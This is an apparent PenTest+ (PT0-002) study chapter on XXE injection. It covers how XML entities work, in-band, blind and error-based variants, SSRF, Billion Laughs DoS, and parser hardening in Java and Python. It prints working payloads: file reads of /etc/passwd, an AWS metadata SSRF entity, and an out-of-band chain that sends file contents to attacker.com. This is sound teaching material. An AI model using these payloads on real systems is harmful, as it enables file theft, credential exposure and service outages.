PT0-002 | Chapter 65 of 104 | Objective 3.2

XXE Injection Attacks

This chapter covers XML External Entity (XXE) Injection attacks, a critical vulnerability that appears in the PT0-002 exam under Attacks and Exploits (Objective 3.2). XXE attacks exploit XML parsers that process external entities, leading to data disclosure, server-side request forgery, denial of service, and, in some configurations, remote code execution. Expect 2-4% of exam questions to involve XXE, often in the context of web application penetration testing or API security assessments.

25 min read
Intermediate
Updated May 31, 2026

The Parcel Delivery Scam

Imagine a company's mailroom. Employees send internal requests using forms that include a 'reply-to' address. The mailroom clerk processes these forms as instructed. A malicious employee submits a form that says: 'Please retrieve the contents of the CEO's safe and deliver them to me.' The clerk, following protocol, executes the request. In XML External Entity (XXE) injection, the XML parser is the mailroom clerk. The application sends XML data to the parser, which processes entity references. An attacker crafts XML that includes an external entity pointing to a sensitive file (like /etc/passwd) or a network resource. If the parser is not configured to disable external entities, it will fetch and include that content in the output. This is like the clerk opening the safe and handing over the contents. The attack works because the parser blindly trusts the entity definition. Mitigation is like training the clerk to ignore any request that references external resources—disabling DTDs or external entity processing altogether. The mechanism is identical: the parser expands the entity and substitutes its value, potentially leaking data or causing server-side request forgery (SSRF) if the entity points to an internal URL.

How It Actually Works

What is XXE Injection?

XXE Injection is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. The attacker can use this to disclose internal files, perform SSRF attacks, cause denial of service (e.g., Billion Laughs attack), or in some cases achieve remote code execution.

How XML Entities Work

XML documents can define entities in a Document Type Definition (DTD). Entities are like variables that hold text or binary data. There are two types: internal entities (defined inline) and external entities (loaded from an external source). An external entity is defined using the SYSTEM keyword followed by a URI. For example:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

When the parser encounters &xxe;, it replaces it with the content of /etc/passwd. If the application returns this data in the response, the attacker reads the file.
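To see the substitution step in isolation, here is a minimal sketch using Python's standard-library xml.etree.ElementTree and a harmless internal entity. The entity name `greeting` and its value are made up for illustration. ElementTree is used only to show expansion itself; according to the Python documentation it does not fetch external entities, so it would not read /etc/passwd.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: an internal entity named "greeting" defined in the DTD.
DOC = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY greeting "hello from the DTD">
]>
<root>&greeting;</root>"""


def expand(doc: str) -> str:
    """Parse the document and return the root element's text after entity expansion."""
    root = ET.fromstring(doc)
    return root.text
```

Calling `expand(DOC)` returns the entity's value rather than the literal `&greeting;`, which is the same replacement an external entity would trigger with file content on a parser that resolves them.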

XXE Attack Vectors

1. In-band XXE: The attacker receives the file content directly in the application's response. This is the simplest and most common in exam scenarios.

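2. Blind XXE: The application does not return the entity content directly. The attacker must use out-of-band (OOB) techniques, such as sending the data to an attacker-controlled server via an HTTP request. The XML specification does not allow a parameter entity to be referenced inside another declaration in the internal DTD subset, so the chain is placed in an external DTD hosted by the attacker (the file name evil.dtd is illustrative). The payload sent to the target only loads that DTD:

<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<root>test</root>

The hosted evil.dtd reads the file and builds the callback:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % wrap "<!ENTITY &#x25; callhome SYSTEM 'http://attacker.com/?data=%file;'>">
%wrap;
%callhome;

This uses parameter entities (%) to chain the file read into a request to the attacker's server. A single-line file such as /etc/hostname usually exfiltrates more reliably than /etc/passwd, because newlines often break the resulting URL.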

3. Error-based XXE: The attacker forces the parser to include the file content in an error message. For instance, the payload references a non-existent path that embeds the sensitive data, so the resulting "file not found" error echoes that data back.
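Working blind payloads usually keep the parameter-entity chain in an attacker-hosted external DTD, since parsers reject parameter entity references inside declarations in the internal subset. The sketch below generates both pieces as strings. The function names, the `wrap` and `callhome` entity names, and the attacker.example host in the usage note are illustrative assumptions, not part of any tool.

```python
def build_external_dtd(target_file: str, callback_url: str) -> str:
    """Return the text of an attacker-hosted DTD that chains a file read into a callback."""
    return (
        f'<!ENTITY % file SYSTEM "{target_file}">\n'
        # &#x25; is the character reference for "%"; it defers parsing of the
        # inner declaration until %wrap; is expanded.
        f'<!ENTITY % wrap "<!ENTITY &#x25; callhome SYSTEM \'{callback_url}?data=%file;\'>">\n'
        "%wrap;\n"
        "%callhome;\n"
    )


def build_trigger(dtd_url: str) -> str:
    """Return the XML sent to the target; it only loads and runs the external DTD."""
    return (
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY % dtd SYSTEM "{dtd_url}">\n'
        "  %dtd;\n"
        "]>\n"
        "<root>test</root>"
    )
```

For example, `build_external_dtd("file:///etc/hostname", "http://attacker.example/")` produces the DTD to host, and `build_trigger("http://attacker.example/evil.dtd")` produces the document to submit during an authorized test.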

Key Components and Defaults

DTD (Document Type Definition): The XML specification allows DTDs to define entity structure. Many parsers process DTDs by default.

External entities: Defined with SYSTEM or PUBLIC identifiers. The URI can be file://, http://, ftp://, etc.

Parameter entities: Used only in DTDs, denoted by %. They are useful for chaining attacks.

XML parsers: Commonly affected parsers include libxml2 (used by PHP), Xerces (Java), MSXML (classic ASP and native Windows applications), and System.Xml (.NET). Many parsers, especially older versions, allow external entity expansion by default.

How to Identify XXE

During a penetration test, look for:

XML input in requests (e.g., SOAP, REST APIs, file uploads like .docx, .svg).

Any response that reflects user input or processes XML.

Error messages that include file paths or internal server information.

Test payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY test SYSTEM "file:///etc/passwd">
]>
<root>&test;</root>

If the response contains the contents of /etc/passwd, XXE is present.
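Checking a response by eye works for one request, but a small helper is handy when several endpoints are tested. The following sketch flags a response body that contains at least one line shaped like an /etc/passwd record. The function name and the regular expression are assumptions chosen for illustration, and a match is an indicator to verify manually rather than proof.

```python
import re

# One passwd record: name:password:UID:GID:comment:home:shell
PASSWD_RECORD = re.compile(
    r"[A-Za-z_][\w.-]*:[^:\s]*:\d+:\d+:[^:\n]*:/[^:\n]*:/[^\s<]*"
)


def reflects_passwd(response_body: str) -> bool:
    """Return True if the body contains text shaped like an /etc/passwd record."""
    return PASSWD_RECORD.search(response_body) is not None
```

The pattern is deliberately unanchored, since reflected content is usually wrapped in the surrounding XML or HTML of the response.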

Exploitation Examples

File Disclosure:

<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">

SSRF:

<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">

This accesses AWS metadata, potentially exposing IAM credentials.

Denial of Service (Billion Laughs):

<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
...
<root>&lol9;</root>

This causes massive entity expansion, consuming memory and CPU.
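The scale of the expansion is easy to work out. The sketch below assumes the elided declarations continue the same tenfold pattern up to lol9, with `lol` counted as level 1; the function names are illustrative.

```python
def expanded_copies(levels: int, fanout: int = 10) -> int:
    """Number of base strings produced when the top-level entity is fully expanded.

    Level 1 is the base entity itself; each further level repeats the
    previous level `fanout` times.
    """
    return fanout ** (levels - 1)


def expanded_bytes(base: str, levels: int, fanout: int = 10) -> int:
    """Size in bytes of the fully expanded text for the given base string."""
    return len(base.encode("utf-8")) * expanded_copies(levels, fanout)
```

Under that assumption, `expanded_copies(9)` is 100,000,000 and `expanded_bytes("lol", 9)` is 300,000,000, so a document of under a kilobyte asks the parser for roughly 300 MB of text. One more tenfold level reaches a billion copies, which is where the attack gets its name.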

Mitigation Techniques

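Disable DTDs entirely: In Java parsers built on Xerces (including the JDK's default JAXP implementation), call setFeature("http://apache.org/xml/features/disallow-doctype-decl", true). Other platforms have their own equivalent, such as DtdProcessing.Prohibit in .NET.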

Disable external entities: For Java, use setFeature("http://xml.org/sax/features/external-general-entities", false).

Use less complex data formats: JSON or YAML are not vulnerable to XXE.

Input validation: Schema validation can help but is not foolproof.

Patch and update: Keep XML parsers up-to-date to avoid known vulnerabilities.
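The "disable DTDs entirely" idea can be sketched with Python's standard-library expat bindings: scan untrusted input and refuse it as soon as a DOCTYPE declaration appears. The function and exception names are illustrative assumptions. Maintained libraries such as defusedxml provide hardened parsers and are usually preferable to a hand-rolled check like this one.

```python
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Scan the document with expat and raise as soon as a DOCTYPE is seen."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    # Malformed XML raises expat.ExpatError; a DOCTYPE raises DoctypeForbidden.
    parser.Parse(xml_bytes, True)
```

Because entities can only be declared inside a DOCTYPE, rejecting it blocks external entities, parameter entities, and entity-expansion payloads in one step.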

Interaction with Other Technologies

XXE can be combined with SSRF to pivot into internal networks. For example, an XXE that reads http://internal-server/ can be used to scan internal hosts. Where DTDs are blocked but the parser has XInclude processing enabled, an xi:include element can pull in external files in a similar way.

Command Examples

In a Java application, secure parser configuration:

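import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Reject any document that contains a DOCTYPE (throws ParserConfigurationException if unsupported)
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth: also disable external general and parameter entities
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);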

In Python (lxml):

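from lxml import etree

# resolve_entities=False leaves entity references unexpanded; no_network=True blocks network lookups
parser = etree.XMLParser(resolve_entities=False, no_network=True)
# xml_input is a file path or file-like object holding the untrusted XML
tree = etree.parse(xml_input, parser)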

Walk-Through

1. Identify XML Input Points

The first step is to locate all places where the application accepts XML input. Common locations include SOAP endpoints, REST APIs with XML content type, file uploads (e.g., .xml, .docx, .svg), and any form that submits data in XML format. Use a proxy like Burp Suite to intercept traffic and inspect content-type headers. Look for `Content-Type: application/xml` or `text/xml`. Also check for hidden XML processing, such as configuration files that are parsed server-side.
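When reviewing a large proxy history, a small filter can shortlist requests worth probing. The sketch below is one way to do that; the function name and the two sets are assumptions for illustration and are not exhaustive.

```python
XML_CONTENT_TYPES = {"application/xml", "text/xml", "application/soap+xml", "image/svg+xml"}
XML_BASED_EXTENSIONS = {".xml", ".svg", ".docx", ".xlsx", ".pptx"}


def is_xml_candidate(content_type: str = "", filename: str = "") -> bool:
    """Return True if the Content-Type header or upload file name suggests XML parsing."""
    # Drop parameters such as "; charset=utf-8" before comparing.
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type in XML_CONTENT_TYPES or media_type.endswith("+xml"):
        return True
    return any(filename.lower().endswith(ext) for ext in XML_BASED_EXTENSIONS)
```

A negative result does not rule an endpoint out, since some applications parse XML regardless of the declared content type.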

2. Craft a Basic XXE Payload

Create a simple XML document that defines an external entity pointing to a known file. For Unix-like systems, use `file:///etc/passwd`; for Windows, `file:///c:/windows/win.ini`. Include the entity reference in the document body. Send this payload to the identified input point and observe the response. If the file contents appear in the response, the application is vulnerable to in-band XXE. If not, proceed to blind XXE techniques.
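A minimal sketch of building that probe for either platform follows. The function name, the `PROBE_FILES` mapping, and the default entity and root names are illustrative; in practice the root element should match whatever the endpoint expects.

```python
PROBE_FILES = {
    "unix": "file:///etc/passwd",
    "windows": "file:///c:/windows/win.ini",
}


def build_probe(platform: str, entity: str = "xxe", root: str = "root") -> str:
    """Return an in-band XXE probe that reads a well-known file for the platform."""
    uri = PROBE_FILES[platform]
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"<!DOCTYPE {root} [\n"
        f'  <!ENTITY {entity} SYSTEM "{uri}">\n'
        "]>\n"
        f"<{root}>&{entity};</{root}>"
    )
```

For a SOAP endpoint, for instance, the entity reference would normally be placed inside a field the service echoes back rather than in a bare root element.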

3. Test for Blind XXE

If the response does not include the file contents, attempt out-of-band (OOB) data exfiltration. Set up a listener on an attacker-controlled server (e.g., using netcat or a web server). Host an external DTD there that uses parameter entities to read the file and request a URL containing its content, for example: `<!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % wrap "<!ENTITY &#x25; callhome SYSTEM 'http://attacker.com/?data=%file;'>"> %wrap; %callhome;`. Then send the target a payload whose DOCTYPE loads that DTD through a parameter entity. The chain has to live in the external DTD because parsers reject parameter entity references inside declarations in the internal subset. The attacker's server logs the request, revealing the hostname.
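The listener side can be as simple as a web server that records the `data` query parameter. The sketch below uses only the Python standard library; the handler, function names, and default port are illustrative assumptions, and netcat or any web server log serves the same purpose.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

captured = []  # exfiltrated values, in arrival order


def extract_data(request_path: str) -> str:
    """Return the decoded 'data' query parameter from a request path, or ''."""
    query = parse_qs(urlparse(request_path).query)
    return query.get("data", [""])[0]


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        captured.append(extract_data(self.path))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, format, *args):
        pass  # keep stderr quiet; results live in `captured`


def run_listener(host: str = "0.0.0.0", port: int = 8000) -> None:
    """Serve until interrupted, recording every callback in `captured`."""
    HTTPServer((host, port), ExfilHandler).serve_forever()
```

Calling `run_listener()` on the test server and then submitting the trigger payload should, if the target is vulnerable and outbound HTTP is allowed, add the file's content to `captured`.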

4. Exploit for SSRF

XXE can be used for Server-Side Request Forgery (SSRF). Change the entity URI to an internal service, such as `http://169.254.169.254/latest/meta-data/` (AWS) or `http://localhost:8080/admin`. If the response includes the internal resource content, the application is vulnerable to SSRF. This can lead to accessing cloud metadata, internal APIs, or scanning internal networks.
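Scanning internal networks this way means sending one payload per candidate URL and comparing responses or response times. A minimal sketch of generating those payloads is shown here; the function name and the example hosts and ports in the usage note are hypothetical.

```python
from itertools import product


def ssrf_payloads(hosts, ports, path="/"):
    """Yield (url, payload) pairs, one XXE document per internal host and port."""
    for host, port in product(hosts, ports):
        url = f"http://{host}:{port}{path}"
        payload = (
            "<!DOCTYPE foo [\n"
            f'  <!ENTITY xxe SYSTEM "{url}">\n'
            "]>\n"
            "<root>&xxe;</root>"
        )
        yield url, payload
```

For example, `list(ssrf_payloads(["localhost", "10.0.0.5"], [80, 8080], "/admin"))` yields four payloads; differences in errors or timing between them hint at which ports are open.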

5. Escalate to RCE or DoS

In some cases, XXE can lead to remote code execution, for example when the application runs on PHP with the expect extension loaded (which enables the `expect://` wrapper), or when an SSRF request reaches an internal service that itself allows file writes or command execution. Test with `expect://id` for PHP. For denial of service, use the Billion Laughs attack: nested entity expansion that grows exponentially and consumes memory. Send a payload with deeply nested entities and monitor server performance. If the server becomes unresponsive, it is vulnerable to DoS.
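The nested-entity structure can be generated for any depth, which makes it easy to start small in a lab. The sketch below builds such a document and measures the expansion of a deliberately tiny instance with Python's ElementTree. The entity names `e1`, `e2`, and so on, and both function names, are illustrative assumptions.

```python
import xml.etree.ElementTree as ET


def nested_entities(levels: int, fanout: int, base: str = "lol") -> str:
    """Build a document with `levels` entities, each repeating the previous one `fanout` times."""
    decls = [f'<!ENTITY e1 "{base}">']
    for n in range(2, levels + 1):
        refs = f"&e{n - 1};" * fanout
        decls.append(f'<!ENTITY e{n} "{refs}">')
    body = "\n  ".join(decls)
    return f"<!DOCTYPE root [\n  {body}\n]>\n<root>&e{levels};</root>"


def expanded_length(levels: int, fanout: int, base: str = "lol") -> int:
    """Parse a small instance locally and return the length of the expanded text."""
    return len(ET.fromstring(nested_entities(levels, fanout, base)).text)
```

With three levels and a fanout of two, the expanded text is four copies of the base string. Keeping the parameters this small when parsing locally avoids exhausting the tester's own machine.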

What This Looks Like on the Job

Scenario 1: SOAP API in a Financial Application

A bank's internal SOAP API processes loan applications. The API accepts XML payloads for data exchange. A penetration tester discovers that the XML parser is configured with default settings, allowing external entities. By sending an XXE payload that reads /etc/shadow, the tester extracts password hashes. The bank then disables DTD processing entirely and switches to JSON for sensitive endpoints. The fix: in Java's DocumentBuilderFactory, set disallow-doctype-decl to true. Performance impact is negligible, but legacy systems required careful regression testing.

Scenario 2: SVG File Upload in a Social Media Platform

A social media site allows users to upload SVG images (which are XML-based). An attacker uploads an SVG containing an XXE payload that reads the server's /etc/passwd and embeds it in the image. The server renders the SVG and returns the file contents as part of the image metadata. The attacker then uses this to pivot to other internal services. The fix: validate SVG files by stripping XML entities and using a secure parser. The company also restricted outbound network access from the rendering service to limit data exfiltration.

Scenario 3: Document Conversion Service

A cloud document converter accepts .docx files (which are ZIP archives containing XML). An attacker modifies the document.xml file inside a .docx to include an XXE payload that targets the internal network's Active Directory server. When the converter processes the file, it makes an SSRF request to http://adserver/. The converted output does not include the response, so the attack is blind, and the attacker uses OOB exfiltration to a controlled domain to retrieve internal network information. The fix: the service now unzips files and validates XML in a sandboxed environment with no network access. The conversion speed decreased by 5%, but security improved significantly.
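Modifying the XML inside a .docx amounts to rewriting one member of a ZIP archive. The following sketch, for use in an authorized test, copies an archive and inserts a DOCTYPE after the XML declaration of one member. The function name is an assumption, and `word/document.xml` is the usual location of the main document part in a .docx.

```python
import io
import zipfile


def inject_doctype(docx_bytes: bytes, doctype: str, member: str = "word/document.xml") -> bytes:
    """Return a copy of the archive with `doctype` inserted into `member`."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == member:
                text = data.decode("utf-8")
                # Insert after the XML declaration if present, else at the start.
                end = text.find("?>") + 2 if text.startswith("<?xml") else 0
                text = text[:end] + "\n" + doctype + "\n" + text[end:]
                data = text.encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()
```

This only adds the DOCTYPE, which is enough for a blind payload that loads an external DTD through a parameter entity. An in-band test would also need an entity reference placed somewhere in the document body.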

How PT0-002 Actually Tests This

PT0-002 Objective 3.2: Given a scenario, exploit vulnerabilities in application-based services.

The exam tests your ability to identify and exploit XXE vulnerabilities. Key areas:

Recognize XML input points (SOAP, REST, file uploads).

Craft basic and blind XXE payloads.

Understand the difference between in-band and out-of-band techniques.

Know how to exfiltrate data using parameter entities.

Identify SSRF as a consequence of XXE.

Common Wrong Answers

1. "XXE only works with file:// protocol" – Wrong. XXE can use http://, ftp://, php://, etc. The exam tests SSRF via http://.

2. "Blind XXE cannot be exploited" – Wrong. Blind XXE can be exploited using OOB channels, error messages, or timing attacks.

3. "XXE only affects PHP applications" – Wrong. An application in any language can be vulnerable if its XML parser resolves external entities, including Java, .NET, Python, etc.

4. "Disabling external entities prevents all XXE" – Partially true. Turning off external general entities alone leaves external parameter entities and internal entity expansion (Billion Laughs) available while DTDs are still enabled. The best practice is to disable DTDs entirely.

Specific Exam Values

Default parsers often allow external entities (e.g., libxml2 before version 2.9.0).

AWS metadata endpoint: http://169.254.169.254/latest/meta-data/

Typical file targets: /etc/passwd, c:\windows\win.ini

Parameter entity syntax: <!ENTITY % name SYSTEM "URI">

OOB exfiltration uses <!ENTITY % callhome SYSTEM "http://attacker.com/?%file;">, declared through an attacker-hosted external DTD.

Edge Cases

XXE in JSON endpoints: Some applications accept XML even if the endpoint is JSON. Test by changing Content-Type to application/xml.

XXE via XInclude: Even if DTDs are disabled, a parser with XInclude processing enabled can pull in external files. Test with <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="file:///etc/passwd" parse="text"/></foo>.

XXE in binary formats: Office documents (OOXML) are ZIP files containing XML. Modify the XML inside.
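The XInclude case can be reproduced locally with the standard-library xml.etree.ElementInclude module, which resolves xi:include elements when called explicitly. This sketch stands in for a parser that has XInclude processing switched on. The function name is illustrative, and the default loader used here opens `href` as a plain file path rather than a file:// URI.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude


def xinclude_text(path: str) -> str:
    """Resolve an xi:include that pulls `path` in as text and return the merged text."""
    doc = (
        '<root xmlns:xi="http://www.w3.org/2001/XInclude">'
        f'<xi:include href="{path}" parse="text"/>'
        "</root>"
    )
    root = ET.fromstring(doc)
    # No DOCTYPE is involved: the include is an ordinary namespaced element.
    ElementInclude.include(root)
    return root.text
```

The file content ends up in the document even though no DTD or entity was declared, which is why disabling DTDs alone does not cover this case.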

How to Eliminate Wrong Answers

Focus on the mechanism: if the parser processes external entities, it can read files or make requests. If the response reflects the entity value, it's in-band. If not, it's blind. Always look for the ability to control XML input. Eliminate answers that claim XXE is impossible without DTDs (XInclude is an alternative) or that XXE affects only specific languages.

Key Takeaways

XXE exploits XML parsers that process external entities.

Always test XML input points with a simple file read payload (e.g., /etc/passwd).

Blind XXE can be exploited using OOB exfiltration via parameter entities.

Disable DTDs entirely to shut down entity-based XXE; disabling only external general entities is insufficient.

XXE can lead to SSRF, file disclosure, DoS, and in some cases RCE.

Common exam targets: AWS metadata endpoint (169.254.169.254), local files, internal services.

Parameter entities are defined with % and are only usable within DTDs.

Easy to Mix Up

These come up on the exam all the time. Here's how to tell them apart.

In-band XXE

File content returned directly in response

Easier to exploit and verify

Requires application to reflect entity value

Common in SOAP APIs with verbose errors

No need for external server

Blind XXE

File content not returned directly

Requires out-of-band or error-based exfiltration

Works even without reflection

Common in REST APIs that suppress errors

Requires attacker-controlled server or DNS

Watch Out for These

Mistake

XXE only works if the application returns the file content in the response.

Correct

Blind XXE does not require direct reflection. Data can be exfiltrated via out-of-band channels (DNS, HTTP), error messages, or timing differences.

Mistake

Disabling external entities fully mitigates XXE.

Correct

Disabling external entities helps, but if DTDs are still enabled, external parameter entities (unless disabled separately) and entity-expansion DoS remain possible. The safest approach is to disable DTDs entirely.

Mistake

XXE is only a web application vulnerability.

Correct

XXE can occur in any application that parses XML, including desktop software, mobile apps, and IoT devices. The exam focuses on web applications, but the principle applies broadly.

Mistake

XXE cannot be used for SSRF.

Correct

XXE is a common vector for SSRF. By setting the entity URI to an internal URL, the server makes a request to that resource, which can be used to access internal services.

Mistake

XXE requires the attacker to have direct access to the server's file system.

Correct

XXE exploits the XML parser's ability to fetch resources from URIs. The attacker does not need direct access; the parser does the work on the server's behalf.


Frequently Asked Questions

What is the difference between internal and external entities in XML?

Internal entities are defined inline within the DTD and their value is a string literal. External entities reference an external resource via a URI, using the SYSTEM or PUBLIC keyword. The XML parser fetches the resource and expands the entity. In XXE, attackers exploit external entities to read local files or make network requests.

How do I test for XXE in a web application?

Identify endpoints that accept XML (e.g., Content-Type: application/xml). Send a payload like `<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>`. If the response contains the file content, it's vulnerable. If not, try blind techniques like OOB exfiltration or error-based XXE.

What is the Billion Laughs attack?

The Billion Laughs attack is a denial-of-service (DoS) attack against XML parsers. It uses nested entity references that expand exponentially, consuming memory and CPU. For example, defining `lol2` as ten copies of `lol`, `lol3` as ten copies of `lol2`, etc., quickly leads to massive expansion. This can crash the parser or the application.

Can XXE be used to achieve remote code execution?

In some cases, yes. If the application runs on PHP with the expect extension loaded, the `expect://` wrapper lets an attacker execute system commands. RCE may also be possible indirectly, when an SSRF request triggered through XXE reaches an internal service that itself permits command execution or file writes. However, these are less common in exam scenarios.

What is the best way to fix XXE vulnerabilities?

The most effective fix is to disable DTD processing entirely in the XML parser. For Java, use `setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)`. For Python lxml, set `resolve_entities=False`. If DTDs must be supported, at least disable external entities and parameter entities. Also consider using JSON instead of XML where possible.

How does XXE relate to SSRF?

XXE can be used to perform Server-Side Request Forgery (SSRF) by defining an external entity with an HTTP URI pointing to an internal resource. The server will make a request to that URI, potentially accessing internal services or cloud metadata. This is a common exam topic.

What is the role of parameter entities in XXE?

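Parameter entities (defined with `%`) are used only within DTDs. They are essential for blind XXE attacks because they allow chaining: one parameter entity reads a file, and another makes an outbound request containing that data. In practice the chain is placed in an attacker-hosted external DTD, because parameter entity references inside declarations are not allowed in the internal subset. They cannot be used in the document body directly.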
